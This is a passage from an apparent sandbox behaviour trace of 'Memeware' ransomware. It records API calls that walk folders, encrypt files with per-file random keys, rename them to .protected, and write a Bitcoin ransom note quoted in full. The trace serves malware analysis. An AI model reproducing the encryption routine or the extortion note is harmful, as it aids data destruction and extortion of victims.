pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\RESTORE_FILES.txt") returned 160 [0079.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.491] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.491] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.493] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.493] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.494] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.494] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.494] CloseHandle (hObject=0x164) returned 1 [0079.494] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.494] lstrcmpiW (lpString1="sr", lpString2="Windows") returned -1 [0079.494] lstrcmpiW (lpString1="sr", lpString2="Program Files") returned 1 [0079.494] lstrcmpiW (lpString1="sr", lpString2="Program Files (x86)") returned 1 [0079.494] lstrcmpiW (lpString1="sr", lpString2="$Recycle.bin") returned 1 [0079.494] lstrcmpiW (lpString1="sr", lpString2="System Volume Information") returned -1 [0079.494] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr") returned 142 [0079.494] lstrcmpW (lpString1="sr", lpString2=".") returned 1 [0079.494] lstrcmpW (lpString1="sr", lpString2="..") returned 1 [0079.494] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\*") returned 144 [0079.494] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.495] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.495] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.495] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.495] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.495] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.495] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\.") returned 144 [0079.496] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.496] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.496] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.496] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.496] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.496] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.496] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.496] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\..") returned 145 [0079.496] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.496] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.496] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.496] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0079.496] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.496] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.496] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.496] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.496] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json") returned 156 [0079.496] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.496] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.496] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.496] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.496] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.536] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json") returned 156 [0079.536] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.537] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json") returned 156 [0079.537] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.537] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json") returned 156 [0079.537] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.537] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x11f, lpOverlapped=0x0) returned 1 [0079.537] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffee1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.537] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x11f, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x11f, lpOverlapped=0x0) returned 1 [0079.538] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.538] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.538] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.538] CloseHandle (hObject=0x168) returned 1 [0079.538] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.protected") returned 166 [0079.538] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.protected")) returned 1 [0079.539] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.539] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.539] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\RESTORE_FILES.txt") returned 160 [0079.539] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.539] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.539] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.540] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.540] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.542] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.542] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.542] CloseHandle (hObject=0x164) returned 1 [0079.542] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.542] lstrcmpiW (lpString1="sv", lpString2="Windows") returned -1 [0079.542] lstrcmpiW (lpString1="sv", lpString2="Program Files") returned 1 [0079.542] lstrcmpiW (lpString1="sv", lpString2="Program Files (x86)") returned 1 [0079.542] lstrcmpiW (lpString1="sv", lpString2="$Recycle.bin") returned 1 [0079.542] lstrcmpiW (lpString1="sv", lpString2="System Volume Information") returned -1 [0079.542] wnsprintfW (in: 
pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv") returned 142 [0079.542] lstrcmpW (lpString1="sv", lpString2=".") returned 1 [0079.542] lstrcmpW (lpString1="sv", lpString2="..") returned 1 [0079.542] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\*") returned 144 [0079.542] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.543] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.543] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.543] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.543] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.543] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.543] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\.") returned 144 [0079.543] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.543] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.543] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.543] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.543] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.543] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.543] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.543] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\..") returned 145 [0079.543] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.543] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.543] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.543] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.543] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.543] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.543] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.543] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.543] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json") returned 156 [0079.543] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.543] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.543] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.543] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.544] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json") returned 156 [0079.544] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.544] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json") returned 156 [0079.544] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.544] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json") returned 156 [0079.544] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.544] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xfd, lpOverlapped=0x0) returned 1 [0079.550] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff03, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.550] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xfd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xfd, lpOverlapped=0x0) returned 1 
[0079.582] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.583] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.583] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.583] CloseHandle (hObject=0x168) returned 1 [0079.583] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.protected") returned 166 [0079.583] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.protected")) returned 1 [0079.584] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.584] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.584] wnsprintfW (in: 
